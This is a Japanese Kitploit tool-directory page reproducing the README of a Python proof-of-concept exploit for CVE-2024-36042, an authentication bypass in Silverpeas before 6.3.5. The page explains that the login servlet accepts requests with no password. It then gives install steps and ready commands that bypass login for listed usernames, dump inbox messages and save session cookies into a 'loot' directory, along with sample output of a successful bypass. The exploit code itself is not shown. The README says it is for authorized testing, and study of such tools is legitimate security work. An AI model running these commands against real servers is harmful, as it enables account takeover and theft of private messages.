Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/ha5ant/silverpeas-authbypass-cve-2024-36042
認証と認可偵察脆弱性分析エクスプロイトウェブアプリケーション悪用情報収集ペネトレーションテストレッドチーミング

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
GitHub
ha5ant/silverpeas-authbypass-cve-2024-36042

Silverpeas-AuthBypass-CVE-2024-36042

Silverpeas < 6.3.5におけるCVE-2024-36042認証バイパス用のPython PoC。バージョン検出、マルチスレッドによるユーザー列挙、メッセージ抽出、および認可されたセキュリティテストのための構造化レポートを特徴としています。

リポジトリを見る
3ヶ月前未レビュー

Silverpeas-AuthBypass-CVE-2024-36042

洗練されたプロフェッショナルグレードのPython3概念実証 — Silverpeas < 6.3.5 において、AuthenticationServlet のパスワード検証欠如によって引き起こされる認証バイパス(CVE-2024-36042)を実証します。

Python 3.8+ License: MIT


概要

Silverpeas の AuthenticationServlet は、POST 本文から Password パラメータが省略された場合でもログイン要求を受け入れ、既知のユーザー名に対して認証済みセッションへのアクセスを許可します。このツールは、モジュール式のマルチスレッドエクスプロイトフレームワークを通じて、高度な偵察、データ抽出、プロフェッショナルなレポート生成を備え、脆弱性を責任を持って実証します。

影響を受けるバージョン: Silverpeas < 6.3.5
CVE: CVE-2024-36042
GHSA: GHSA-qvh3-8c57-gp4m


機能


インストール

root@kitploit:~
git clone https://github.com/YOURNAME/Silverpeas-AuthBypass-CVE-2024-36042.git
cd Silverpeas-AuthBypass-CVE-2024-36042
pip install requests beautifulsoup4

使用方法

クイックテスト(組み込みユーザーリスト)

root@kitploit:~
python3 CVE-2024-36042.py -t http://TARGET:8080 --dump-messages

高度なレポート(Markdown + コンソール)

root@kitploit:~
python3 CVE-2024-36042.py -t http://TARGET:8080 -u admin --dump-messages --message-output both

フォレンジックエクスポート(メッセージごとの個別ファイル)

root@kitploit:~
python3 CVE-2024-36042.py -t http://TARGET:8080 --userlist users.txt --dump-messages --message-output files --output-format md --outdir ./loot

バージョンチェックのみ(エクスプロイトなし)

root@kitploit:~
python3 CVE-2024-36042.py -t http://TARGET:8080 --check-version --no-exploit

プロキシ経由で生のHTMLログを取得

root@kitploit:~
python3 CVE-2024-36042.py -t http://TARGET:8080 --proxy http://127.0.0.1:8080 --dump-messages --save-raw-html

出力管理

このツールは、ダンプされたメッセージに対して --message-output を介して4つの主要な出力モードをサポートしています。

  1. console(デフォルト): クリーニングされたメッセージをキーワードハイライト付きで直接端末に出力します。
  2. markdown : 出力ディレクトリにアカウントごとに1つの {username}_messages.md レポートを生成します。
  3. files : アカウントごとにフォルダを作成し、各メッセージを個別ファイル(例: message_0006.md)として保存します。IDは0埋めされ、ファイルシステム上で整然とソートされます。
  4. both : console モードと markdown モードを組み合わせます。

成果物の構造

root@kitploit:~
outdir/
├── SilverAdmin/
│   ├── message_0001.md
│   ├── message_0002.md
│   ├── raw/ (オプション: --save-raw-html)
│   │   └── msg_1.html
│   └── session_cookies.txt
├── scr1ptkiddy/
│   ├── messages.md
│   └── session_cookies.txt
└── summary.json

CLI リファレンス

root@kitploit:~
-t, --target        SilverpeasのベースURL(必須)
-u, --user          ターゲットとする単一のユーザー名
--userlist          1行に1ユーザー名のファイル
--dump-messages     受信トレイメッセージをスクレイピングして表示
--max-id            チェックする最大メッセージID(デフォルト: 50)
--threads           同時実行ワーカー数(デフォルト: 5)
--proxy             HTTPプロキシURL
--message-output    出力モード: {console, markdown, files, both}
--output-format     ファイル形式: {md, txt}
--json              完全なJSONレポートをエクスポート
--csv               スクレイピングしたメッセージのCSVをエクスポート
--outdir            エクスポート先の出力ディレクトリ
--no-color          ANSIカラー出力を無効化(ログ用に便利)
--save-raw-html     デバッグ用に生のHTML応答を保存
--check-version     バージョンのみを特定
--no-exploit        エクスプロイトをスキップ(--check-versionと組み合わせて使用)
--quiet, -q         最小限の出力
--no-banner         バナーを表示しない

出力例

root@kitploit:~
[*] Target   : http://10.49.169.44:8080
[*] Version  : 6.3.1
[+] Version 6.3.1 < 6.3.5 - vulnerable.

[*] Trying: scr1ptkiddy
[+] BYPASSED -> scr1ptkiddy
[+] Data saved to ./scr1ptkiddy

────────────────────────────────────────────────────────────────────
  Execution Summary
────────────────────────────────────────────────────────────────────
┌───────────────┬──────────┬──────────┐
│ Account       │ Status   │ Messages │
├───────────────┼──────────┼──────────┤
│ scr1ptkiddy   │ SUCCESS  │ 6        │
│ admin         │ FAILED   │ 0        │
└───────────────┴──────────┴──────────┘

[+] JSON report -> ./report_20260516_013210.json

なぜこれが存在するのか

このリポジトリは、私のオフェンシブセキュリティポートフォリオの一部です。以下のことを示しています。

  • 脆弱性研究の翻訳 — 公開されたCVEを動作可能で信頼性の高いエクスプロイトに変換します。
  • 高品質なツール作成 — 堅牢なエラーハンドリング、多言語サポート、構造化された出力管理。
  • 運用意識 — 実際の環境に対応するためのマルチスレッド、プロキシサポート、重複除去ロジック。
  • プロフェッショナルエンジニアリング — クリーンなコードアーキテクチャ、包括的なドキュメント、操作体験(UX)への焦点。

免責事項

このツールは、許可されたセキュリティテスト、研究、教育目的のみで提供されます。コンピュータシステムへの不正アクセスは違法です。自身が所有していないインフラストラクチャをテストする前に、必ず明示的な許可を得てください。


ライセンス

MIT

ツールをダウンロード
機能説明
バージョン検出悪用前にSilverpeasのバージョンと脆弱性の状態を特定します。
マルチスレッドThreadPoolExecutor による並行ユーザー列挙とスレッドセーフな出力。
高度な発見多言語(英語/フランス語)対応のエンドポイント発見と複数IDプロービング。
データ抽出高忠実度のメッセージダンプ、重複除去、定型文フィルタリング。
柔軟な出力コンソール、Markdownレポート、個別ファイルエクスポート(.md または .txt)をサポート。
プロキシ&デバッグBurp/ZAP経由のルーティング(--proxy)とパーサーデバッグ用の生HTML保存。
クリーンなUXASCIIサマリーテーブル、キーワードハイライト、オプションのANSI色制御。